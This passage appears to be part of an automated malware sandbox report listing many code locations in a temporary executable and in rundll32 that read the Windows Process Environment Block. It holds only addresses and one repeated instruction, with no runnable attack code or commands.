Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01549240 mov eax, dword ptr fs:[00000030h]	2_2_01549240
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01549240 mov eax, dword ptr fs:[00000030h]	2_2_01549240
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01549240 mov eax, dword ptr fs:[00000030h]	2_2_01549240
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01549240 mov eax, dword ptr fs:[00000030h]	2_2_01549240
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01557E41 mov eax, dword ptr fs:[00000030h]	2_2_01557E41
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01557E41 mov eax, dword ptr fs:[00000030h]	2_2_01557E41
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01557E41 mov eax, dword ptr fs:[00000030h]	2_2_01557E41
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01557E41 mov eax, dword ptr fs:[00000030h]	2_2_01557E41
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01557E41 mov eax, dword ptr fs:[00000030h]	2_2_01557E41
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01557E41 mov eax, dword ptr fs:[00000030h]	2_2_01557E41
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0158927A mov eax, dword ptr fs:[00000030h]	2_2_0158927A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156AE73 mov eax, dword ptr fs:[00000030h]	2_2_0156AE73
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156AE73 mov eax, dword ptr fs:[00000030h]	2_2_0156AE73
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156AE73 mov eax, dword ptr fs:[00000030h]	2_2_0156AE73
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156AE73 mov eax, dword ptr fs:[00000030h]	2_2_0156AE73
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0156AE73 mov eax, dword ptr fs:[00000030h]	2_2_0156AE73
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155766D mov eax, dword ptr fs:[00000030h]	2_2_0155766D
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015FB260 mov eax, dword ptr fs:[00000030h]	2_2_015FB260
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015FB260 mov eax, dword ptr fs:[00000030h]	2_2_015FB260
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154AA16 mov eax, dword ptr fs:[00000030h]	2_2_0154AA16
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154AA16 mov eax, dword ptr fs:[00000030h]	2_2_0154AA16
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01545210 mov eax, dword ptr fs:[00000030h]	2_2_01545210
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01545210 mov ecx, dword ptr fs:[00000030h]	2_2_01545210
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01545210 mov eax, dword ptr fs:[00000030h]	2_2_01545210
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01545210 mov eax, dword ptr fs:[00000030h]	2_2_01545210
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01563A1C mov eax, dword ptr fs:[00000030h]	2_2_01563A1C
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157A61C mov eax, dword ptr fs:[00000030h]	2_2_0157A61C
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157A61C mov eax, dword ptr fs:[00000030h]	2_2_0157A61C
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154C600 mov eax, dword ptr fs:[00000030h]	2_2_0154C600
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154C600 mov eax, dword ptr fs:[00000030h]	2_2_0154C600
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154C600 mov eax, dword ptr fs:[00000030h]	2_2_0154C600
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01578E00 mov eax, dword ptr fs:[00000030h]	2_2_01578E00
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01558A0A mov eax, dword ptr fs:[00000030h]	2_2_01558A0A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015FFE3F mov eax, dword ptr fs:[00000030h]	2_2_015FFE3F
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601608 mov eax, dword ptr fs:[00000030h]	2_2_01601608
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154E620 mov eax, dword ptr fs:[00000030h]	2_2_0154E620
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01584A2C mov eax, dword ptr fs:[00000030h]	2_2_01584A2C
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01584A2C mov eax, dword ptr fs:[00000030h]	2_2_01584A2C
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015736CC mov eax, dword ptr fs:[00000030h]	2_2_015736CC
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01572ACB mov eax, dword ptr fs:[00000030h]	2_2_01572ACB
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015FFEC0 mov eax, dword ptr fs:[00000030h]	2_2_015FFEC0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01588EC7 mov eax, dword ptr fs:[00000030h]	2_2_01588EC7
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01572AE4 mov eax, dword ptr fs:[00000030h]	2_2_01572AE4
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015716E0 mov ecx, dword ptr fs:[00000030h]	2_2_015716E0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01618ED6 mov eax, dword ptr fs:[00000030h]	2_2_01618ED6
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015576E2 mov eax, dword ptr fs:[00000030h]	2_2_015576E2
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157D294 mov eax, dword ptr fs:[00000030h]	2_2_0157D294
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157D294 mov eax, dword ptr fs:[00000030h]	2_2_0157D294
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01610EA5 mov eax, dword ptr fs:[00000030h]	2_2_01610EA5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01610EA5 mov eax, dword ptr fs:[00000030h]	2_2_01610EA5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01610EA5 mov eax, dword ptr fs:[00000030h]	2_2_01610EA5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015DFE87 mov eax, dword ptr fs:[00000030h]	2_2_015DFE87
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0155AAB0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0155AAB0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157FAB0 mov eax, dword ptr fs:[00000030h]	2_2_0157FAB0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015452A5 mov eax, dword ptr fs:[00000030h]	2_2_015452A5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015452A5 mov eax, dword ptr fs:[00000030h]	2_2_015452A5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015452A5 mov eax, dword ptr fs:[00000030h]	2_2_015452A5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015452A5 mov eax, dword ptr fs:[00000030h]	2_2_015452A5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015452A5 mov eax, dword ptr fs:[00000030h]	2_2_015452A5
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015C46A7 mov eax, dword ptr fs:[00000030h]	2_2_015C46A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04500050 mov eax, dword ptr fs:[00000030h]	16_2_04500050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04500050 mov eax, dword ptr fs:[00000030h]	16_2_04500050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457C450 mov eax, dword ptr fs:[00000030h]	16_2_0457C450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457C450 mov eax, dword ptr fs:[00000030h]	16_2_0457C450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A2073 mov eax, dword ptr fs:[00000030h]	16_2_045A2073
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B1074 mov eax, dword ptr fs:[00000030h]	16_2_045B1074
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450746D mov eax, dword ptr fs:[00000030h]	16_2_0450746D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04567016 mov eax, dword ptr fs:[00000030h]	16_2_04567016
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04567016 mov eax, dword ptr fs:[00000030h]	16_2_04567016
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04567016 mov eax, dword ptr fs:[00000030h]	16_2_04567016
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B4015 mov eax, dword ptr fs:[00000030h]	16_2_045B4015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B4015 mov eax, dword ptr fs:[00000030h]	16_2_045B4015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B740D mov eax, dword ptr fs:[00000030h]	16_2_045B740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B740D mov eax, dword ptr fs:[00000030h]	16_2_045B740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B740D mov eax, dword ptr fs:[00000030h]	16_2_045B740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1C06 mov eax, dword ptr fs:[00000030h]	16_2_045A1C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04566C0A mov eax, dword ptr fs:[00000030h]	16_2_04566C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04566C0A mov eax, dword ptr fs:[00000030h]	16_2_04566C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04566C0A mov eax, dword ptr fs:[00000030h]	16_2_04566C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04566C0A mov eax, dword ptr fs:[00000030h]	16_2_04566C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FB02A mov eax, dword ptr fs:[00000030h]	16_2_044FB02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FB02A mov eax, dword ptr fs:[00000030h]	16_2_044FB02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FB02A mov eax, dword ptr fs:[00000030h]	16_2_044FB02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FB02A mov eax, dword ptr fs:[00000030h]	16_2_044FB02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451BC2C mov eax, dword ptr fs:[00000030h]	16_2_0451BC2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457B8D0 mov eax, dword ptr fs:[00000030h]	16_2_0457B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457B8D0 mov ecx, dword ptr fs:[00000030h]	16_2_0457B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457B8D0 mov eax, dword ptr fs:[00000030h]	16_2_0457B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457B8D0 mov eax, dword ptr fs:[00000030h]	16_2_0457B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457B8D0 mov eax, dword ptr fs:[00000030h]	16_2_0457B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0457B8D0 mov eax, dword ptr fs:[00000030h]	16_2_0457B8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B8CD6 mov eax, dword ptr fs:[00000030h]	16_2_045B8CD6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A14FB mov eax, dword ptr fs:[00000030h]	16_2_045A14FB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04566CF0 mov eax, dword ptr fs:[00000030h]	16_2_04566CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04566CF0 mov eax, dword ptr fs:[00000030h]	16_2_04566CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04566CF0 mov eax, dword ptr fs:[00000030h]	16_2_04566CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E9080 mov eax, dword ptr fs:[00000030h]	16_2_044E9080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04563884 mov eax, dword ptr fs:[00000030h]	16_2_04563884
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04563884 mov eax, dword ptr fs:[00000030h]	16_2_04563884
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451F0BF mov ecx, dword ptr fs:[00000030h]	16_2_0451F0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451F0BF mov eax, dword ptr fs:[00000030h]	16_2_0451F0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451F0BF mov eax, dword ptr fs:[00000030h]	16_2_0451F0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045290AF mov eax, dword ptr fs:[00000030h]	16_2_045290AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04507D50 mov eax, dword ptr fs:[00000030h]	16_2_04507D50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04523D43 mov eax, dword ptr fs:[00000030h]	16_2_04523D43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450B944 mov eax, dword ptr fs:[00000030h]	16_2_0450B944
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450B944 mov eax, dword ptr fs:[00000030h]	16_2_0450B944
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04563540 mov eax, dword ptr fs:[00000030h]	16_2_04563540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450C577 mov eax, dword ptr fs:[00000030h]	16_2_0450C577
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450C577 mov eax, dword ptr fs:[00000030h]	16_2_0450C577
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EC962 mov eax, dword ptr fs:[00000030h]	16_2_044EC962
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EB171 mov eax, dword ptr fs:[00000030h]	16_2_044EB171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EB171 mov eax, dword ptr fs:[00000030h]	16_2_044EB171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E9100 mov eax, dword ptr fs:[00000030h]	16_2_044E9100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E9100 mov eax, dword ptr fs:[00000030h]	16_2_044E9100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E9100 mov eax, dword ptr fs:[00000030h]	16_2_044E9100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0456A537 mov eax, dword ptr fs:[00000030h]	16_2_0456A537
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04514D3B mov eax, dword ptr fs:[00000030h]	16_2_04514D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04514D3B mov eax, dword ptr fs:[00000030h]	16_2_04514D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04514D3B mov eax, dword ptr fs:[00000030h]	16_2_04514D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451513A mov eax, dword ptr fs:[00000030h]	16_2_0451513A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451513A mov eax, dword ptr fs:[00000030h]	16_2_0451513A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B8D34 mov eax, dword ptr fs:[00000030h]	16_2_045B8D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04504120 mov eax, dword ptr fs:[00000030h]	16_2_04504120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04504120 mov eax, dword ptr fs:[00000030h]	16_2_04504120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04504120 mov eax, dword ptr fs:[00000030h]	16_2_04504120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04504120 mov eax, dword ptr fs:[00000030h]	16_2_04504120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04504120 mov ecx, dword ptr fs:[00000030h]	16_2_04504120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F3D34 mov eax, dword ptr fs:[00000030h]	16_2_044F3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EAD30 mov eax, dword ptr fs:[00000030h]	16_2_044EAD30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04598DF1 mov eax, dword ptr fs:[00000030h]	16_2_04598DF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EB1E1 mov eax, dword ptr fs:[00000030h]	16_2_044EB1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EB1E1 mov eax, dword ptr fs:[00000030h]	16_2_044EB1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EB1E1 mov eax, dword ptr fs:[00000030h]	16_2_044EB1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FD5E0 mov eax, dword ptr fs:[00000030h]	16_2_044FD5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FD5E0 mov eax, dword ptr fs:[00000030h]	16_2_044FD5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045741E8 mov eax, dword ptr fs:[00000030h]	16_2_045741E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E2D8A mov eax, dword ptr fs:[00000030h]	16_2_044E2D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E2D8A mov eax, dword ptr fs:[00000030h]	16_2_044E2D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E2D8A mov eax, dword ptr fs:[00000030h]	16_2_044E2D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E2D8A mov eax, dword ptr fs:[00000030h]	16_2_044E2D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E2D8A mov eax, dword ptr fs:[00000030h]	16_2_044E2D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451FD9B mov eax, dword ptr fs:[00000030h]	16_2_0451FD9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451FD9B mov eax, dword ptr fs:[00000030h]	16_2_0451FD9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450C182 mov eax, dword ptr fs:[00000030h]	16_2_0450C182
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451A185 mov eax, dword ptr fs:[00000030h]	16_2_0451A185
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045135A1 mov eax, dword ptr fs:[00000030h]	16_2_045135A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04574257 mov eax, dword ptr fs:[00000030h]	16_2_04574257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E9240 mov eax, dword ptr fs:[00000030h]	16_2_044E9240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E9240 mov eax, dword ptr fs:[00000030h]	16_2_044E9240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E9240 mov eax, dword ptr fs:[00000030h]	16_2_044E9240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E9240 mov eax, dword ptr fs:[00000030h]	16_2_044E9240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F7E41 mov eax, dword ptr fs:[00000030h]	16_2_044F7E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F7E41 mov eax, dword ptr fs:[00000030h]	16_2_044F7E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F7E41 mov eax, dword ptr fs:[00000030h]	16_2_044F7E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F7E41 mov eax, dword ptr fs:[00000030h]	16_2_044F7E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F7E41 mov eax, dword ptr fs:[00000030h]	16_2_044F7E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F7E41 mov eax, dword ptr fs:[00000030h]	16_2_044F7E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F766D mov eax, dword ptr fs:[00000030h]	16_2_044F766D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450AE73 mov eax, dword ptr fs:[00000030h]	16_2_0450AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450AE73 mov eax, dword ptr fs:[00000030h]	16_2_0450AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450AE73 mov eax, dword ptr fs:[00000030h]	16_2_0450AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450AE73 mov eax, dword ptr fs:[00000030h]	16_2_0450AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0450AE73 mov eax, dword ptr fs:[00000030h]	16_2_0450AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0452927A mov eax, dword ptr fs:[00000030h]	16_2_0452927A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0459B260 mov eax, dword ptr fs:[00000030h]	16_2_0459B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0459B260 mov eax, dword ptr fs:[00000030h]	16_2_0459B260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B8A62 mov eax, dword ptr fs:[00000030h]	16_2_045B8A62
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04503A1C mov eax, dword ptr fs:[00000030h]	16_2_04503A1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451A61C mov eax, dword ptr fs:[00000030h]	16_2_0451A61C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451A61C mov eax, dword ptr fs:[00000030h]	16_2_0451A61C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EC600 mov eax, dword ptr fs:[00000030h]	16_2_044EC600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EC600 mov eax, dword ptr fs:[00000030h]	16_2_044EC600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EC600 mov eax, dword ptr fs:[00000030h]	16_2_044EC600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0459FE3F mov eax, dword ptr fs:[00000030h]	16_2_0459FE3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EE620 mov eax, dword ptr fs:[00000030h]	16_2_044EE620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B8ED6 mov eax, dword ptr fs:[00000030h]	16_2_045B8ED6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04528EC7 mov eax, dword ptr fs:[00000030h]	16_2_04528EC7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0459FEC0 mov eax, dword ptr fs:[00000030h]	16_2_0459FEC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045136CC mov eax, dword ptr fs:[00000030h]	16_2_045136CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F76E2 mov eax, dword ptr fs:[00000030h]	16_2_044F76E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045116E0 mov ecx, dword ptr fs:[00000030h]	16_2_045116E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451D294 mov eax, dword ptr fs:[00000030h]	16_2_0451D294
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451D294 mov eax, dword ptr fs:[00000030h]	16_2_0451D294
